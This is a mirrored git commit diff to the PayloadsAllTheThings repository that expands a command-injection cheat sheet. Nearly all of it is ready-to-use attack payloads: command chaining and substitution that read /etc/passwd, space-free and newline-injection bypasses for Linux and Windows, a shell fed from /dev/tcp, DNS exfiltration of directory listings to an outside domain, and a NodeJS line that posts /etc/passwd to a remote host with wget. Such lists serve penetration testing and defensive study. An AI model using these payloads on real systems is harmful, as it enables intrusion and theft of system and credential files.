mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 04:46:10 +00:00
Command Exec - ``, $() and more bypasses
This commit is contained in:
parent
e7cb8a2ce1
commit
278a130940
@ -1,9 +1,9 @@
|
|||||||
# Remote Code Execution
|
# Remote Commands Execution
|
||||||
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
|
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
|
||||||
|
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
Normal code execution, execute the command and voila :p
|
Normal Commands execution, execute the command and voila :p
|
||||||
```
|
```
|
||||||
cat /etc/passwd
|
cat /etc/passwd
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
@ -12,15 +12,20 @@ bin:x:2:2:bin:/bin:/bin/sh
|
|||||||
sys:x:3:3:sys:/dev:/bin/sh
|
sys:x:3:3:sys:/dev:/bin/sh
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution by chaining commands
|
Commands execution by chaining commands
|
||||||
```
|
```
|
||||||
original_cmd_by_server; ls
|
original_cmd_by_server; ls
|
||||||
original_cmd_by_server && ls
|
original_cmd_by_server && ls
|
||||||
original_cmd_by_server | ls
|
original_cmd_by_server | ls
|
||||||
original_cmd_by_server `ls`
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution without space - Linux
|
Commands execution inside a command
|
||||||
|
```
|
||||||
|
original_cmd_by_server `cat /etc/passwd`
|
||||||
|
original_cmd_by_server $(cat /etc/passwd)
|
||||||
|
```
|
||||||
|
|
||||||
|
Commands execution without space - Linux
|
||||||
```
|
```
|
||||||
swissky@crashlab:~/Www$ cat</etc/passwd
|
swissky@crashlab:~/Www$ cat</etc/passwd
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
@ -44,18 +49,23 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
|
|||||||
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
||||||
```
|
```
|
||||||
|
|
||||||
Code execution without space - Windows
|
Commands execution without space - Windows
|
||||||
```
|
```
|
||||||
ping%CommonProgramFiles:~10,-18%IP
|
ping%CommonProgramFiles:~10,-18%IP
|
||||||
ping%PROGRAMFILES:~10,-5%IP
|
ping%PROGRAMFILES:~10,-5%IP
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
Code execution without spaces, $ or { } - Linux (Bash only)
|
Commands execution without spaces, $ or { } - Linux (Bash only)
|
||||||
```
|
```
|
||||||
IFS=,;`cat<<<uname,-a`
|
IFS=,;`cat<<<uname,-a`
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Commands execution with a line return
|
||||||
|
```
|
||||||
|
something%0Acat%20/etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
## Time based data exfiltration
|
## Time based data exfiltration
|
||||||
Extracting data : char by char
|
Extracting data : char by char
|
||||||
```
|
```
|
||||||
@ -80,7 +90,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
|||||||
```
|
```
|
||||||
|
|
||||||
## Environment based
|
## Environment based
|
||||||
NodeJS Code execution
|
NodeJS Commands execution
|
||||||
```
|
```
|
||||||
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user